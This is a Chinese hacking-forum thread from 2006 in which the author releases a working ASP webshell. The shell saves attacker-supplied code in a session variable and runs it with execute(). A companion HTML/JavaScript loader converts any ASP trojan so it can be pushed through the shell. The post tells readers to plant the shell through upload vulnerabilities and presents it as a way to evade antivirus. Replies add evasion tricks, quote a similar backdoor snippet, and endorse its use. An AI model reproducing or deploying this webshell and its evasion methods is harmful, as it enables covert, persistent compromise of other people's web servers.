文章作者：虫虫
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

7天前俺询问netxfly合不合适把这个工具发出来,结果都不理俺~~~嘿嘿~~51节嘛,  大家都好忙哪~

asp万能溶剂----呵呵,忽然想出了一个这样的名字给我的小工具,感觉还够形象.
这是一个演示版本

先打个广告吧:
虫虫的asp万能溶剂----主要用于asp木马的免杀.目前为止可以使大部分的asp木马(不使用include的马)完全免受杀毒软件的追杀(不过LAKE的ASP木马查杀工具可以找到俺)~~

哈哈哈,好了不说了,发现我废话好多

其实很简单:思路就是将asp代码写入到session中保存,使用是只要execute(session("xx"))就可以,由于不用写文件,所以免除了被杀的危险,使用的时候感觉这个asp完全变成了要使用的木马~~所以想了个名字叫asp万能溶剂~其实俺还想叫他asp变形虫虫~~~
这样不追求将asp特征码修改而是完全不使用文件存储木马,可以说是另外一个免杀的思路吧.

代码分两部分,本地部分和服务器上的asp部分,跟一句话木马貌似,其实就是一句话的改进.
代码里有些注释,可以看看.

这是偶的代码:服务器上的asp部分

复制内容到剪贴板

代码:

<%if request("aspcode_estcc_060430")<>"" then
   session("aspcode_estcc_060430")=request("aspcode_estcc_060430")
end If
execute(session("aspcode_estcc_060430"))%>

这是本地部分,为啥还写一个这么麻烦的本地部分呢,因为如果asp马里有<%这个的话execute就不能正确执行,只好变通一下拉~~写的不是很好,大家批评一下吧:

复制内容到剪贴板

代码:

<style type="text/css">
body,textarea,form,input,button
{
   font-size:12px;
   border-width:1px;
   border-style:double;
}
</style>
<script>
function c1(ns)  //处理非asp代码
{   
   s=ns.replace(/"/igm,"\"\"");
   s= s.replace(/\r\n/igm,"\"+vbCrLf+\"");
   s="\nresponse.write \""+s+"\"\n";
   //s= s.replace(/\+""[^"]|[^"]""\+/gm,"$1"); 本意是清除一些无用的语句，如 xx=""+vbcrlf+""，不过总有错误，放弃。
   return s;
}

function c() //全部转换成asp代码，因为<%一类的字符会使execute出错，
{   
   var s=new String(document.all.text.value);
   var finished=new String();
   s=s.replace(/<%=(.+?)%>/gm,"<%Response.write $1%>");  //先处理<%=xx%>这种情况
   var aspCode=new RegExp("<%((.|\r|\n)*?)%>","igm");
   while(aspCode.exec(s)!=null)
   {   
      t=RegExp.$1;
      s=RegExp.rightContext;
      finished+=c1(RegExp.leftContext);
      finished+=t;
      aspCode.lastIndex=0;
   }
   if (s!=null){ finished += c1(s);   }
   document.all.text.value=finished;
}
function check()
{
   if(document.all.fpath.value==""){alert("溶剂在哪里啊溶剂在哪里?");}
   else{
      document.all.form1.action=document.all.fpath.value;
      if (document.all.text.value==""){alert("把asp木马的内容全部复制过来丫~");}
      else{
        c();
        form1.submit();
      }
   }
}
</script>
<body>
<center><span style="font-size:14px;color:red;">虫虫的ASP万能溶剂(变形虫虫?)</span>
<form method=post action="" id=form1>
<input type=hidden name=act_estcc_060430 ><!-- 加一些额外的操作例如在session中保存多个木马 还没写相关代码 -->
<textarea id=text ROWS="30" COLS="80" name=aspcode_estcc_060430></textarea><br>把asp文件打开后整个复制过来就可以<br>include变通自己想办法吧
</form><br>
溶剂在这个地方：
<input type=text id=fpath>
<button onclick=&#39;check()&#39;>开始溶解!</button>

使用的时候利用上传漏洞把那个asp部分保存到服务器上去(这个东西还没有杀毒软件认识,所以可以放心的往上扔,呵呵),然后打开本地的那个html文件,把你的木马放上去就可以啦~~以后访问这个asp的时候效果跟访问木马一模一样~~(万能变形虫,哈哈),什么时候想换马重新"溶解"一次就好啦~~

好了,不废话了,大家使用一下看看有什么不方便的地方再讨论吧.
AAV.rar (2 KB)

AAV.rar (2 KB)
下载次数: 746

2006-5-8 16:36

请问楼主
<%if request("aspcode_estcc_060430")<>"" then
  session("aspcode_estcc_060430")=request("aspcode_estcc_060430")
end If
execute(session("aspcode_estcc_060430"))%>
换成<%if request("aspcode_estcc_060430")<>"" then
execute(request("aspcode_estcc_060430"))%>
有什么不一样呢？
而且实在看不出，这和海洋的C\S版的木马有什么区别呢。。除了长一点？

丫没看文章把,楼主的文章的精髓就在被你省略的那句里面了.

其实大多程序都没使用execute吧,有什么程序能用到吗?看到这个就干掉不就省了.

引用:

这里是引用第[4 楼]的ZV于2006-05-08 21:25发表的：
丫没看文章把,楼主的文章的精髓就在被你省略的那句里面了.

其实大多程序都没使用execute吧,有什么程序能用到吗?看到这个就干掉不就省了.

恩,是啊. 连接数据库的时候也有一个execute,不过那个execute是肯定前面有一个点的就是conn.execute   LAKE大哥对这个研究最多.所以我前面说还是躲不过LAKE的杀毒~~哈哈

要是单纯检查execute的话倒是有方法躲过,就是使用eval  ,js里常有eval,asp里也是可以使用的.
eval "ex"+"ecute...."  的话倒是没有execute了,但是eval又是被关注的对象.呵呵

这些也不是我自己想出来的,好象LAKE大哥在黑防上说过?
还没想到更好的方法.用微软的加密工具倒是不错的想法.

海洋木马2006a
<script language="vbscript" runat="server">
If Request("password")<>"" Then Session("lcxMarcos")=Request("password")
If Session("lcxMarcos")<>"" Then Execute(Session("lcxMarcos"))
</script>
楼主的
<%if request("aspcode_estcc_060430")<>"" then
  session("aspcode_estcc_060430")=request("aspcode_estcc_060430")
end If
execute(session("aspcode_estcc_060430"))%>

没有什么新意,都是一个原理,把木马写到进程里面,从内存调用来执行

哦，我终于理解到楼主的想法了哈~~
楼主的想法是这样的，以后只要访问这个页面，就可以直接得到后门哈
呵呵
是这样吧，服务器，本地，相对都没有文件存在？
是这个意思吧？呵呵。谢谢ZV大哥的提醒

ps：本来准备关了电脑准备睡觉了，不过想起了那一个 if XXX<>"" then这一句，好象直接访问应该得不到后门吧，今天就先看到这了
明天起来再看，睡觉的时候想一想，会有什么特别的东西在里面哈。

引用:

这里是引用第[4 楼]的晨曦于2006-05-08 22:07发表的：
海洋木马2006a
<script language="vbscript" runat="server">
If Request("password")<>"" Then Session("lcxMarcos")=Request("password")
If Session("lcxMarcos")<>"" Then Execute(Session("lcxMarcos"))
</script>
.......

...这个..不好意思,
写这个的时候主要考虑是免杀也没考虑太多.
用这个工具方便之处就在不用辛辛苦苦的做免杀了
可是我没有看过海洋木马2006a的代码~~还以为是第一个呢,抱歉.
[s:57]

海阳2006还有用Application对象的

强人....

思路就是将asp代码写入到session中保存,使用是只要execute(session("xx"))就可以

另外，如果我没搞错的话，一句话需要写入权限。这个不需要。
收藏了，以后就用这个。

再加上手工免杀，这威力，我就不说了。PS：我个人比较喜欢手工免杀。 [s:45]

虽然原理和海阳C/S端没什么两样，实验过后发现的确很不错，就当是一个“新”的一句话吧

用着还挺不错的……呵呵

...谢谢斑竹的赏识.

最近也发现网上有很多copy了,但是...真正会用的,恐怕不多.

它的最合适的用途,不是免杀,而是WebShell后门的隐藏...

最新的版本...包含了asp代码的注入与文件最后修改时间的恢复...一些专杀的避归...有自己的技术,也吸收了很多的优秀木马的代码片段... 没有在任何地方发布,因为没有多少技术含量,纯粹一tool了. 不照顾ToolsKid了,虽然我本身也是.

感觉想说的是...一句话是一种WebShell的形式,而不仅仅是那一句代码吧.

今天终于明白了海阳C/S的工作原理了哈！原来是这样啊！
谢谢搂住了哈！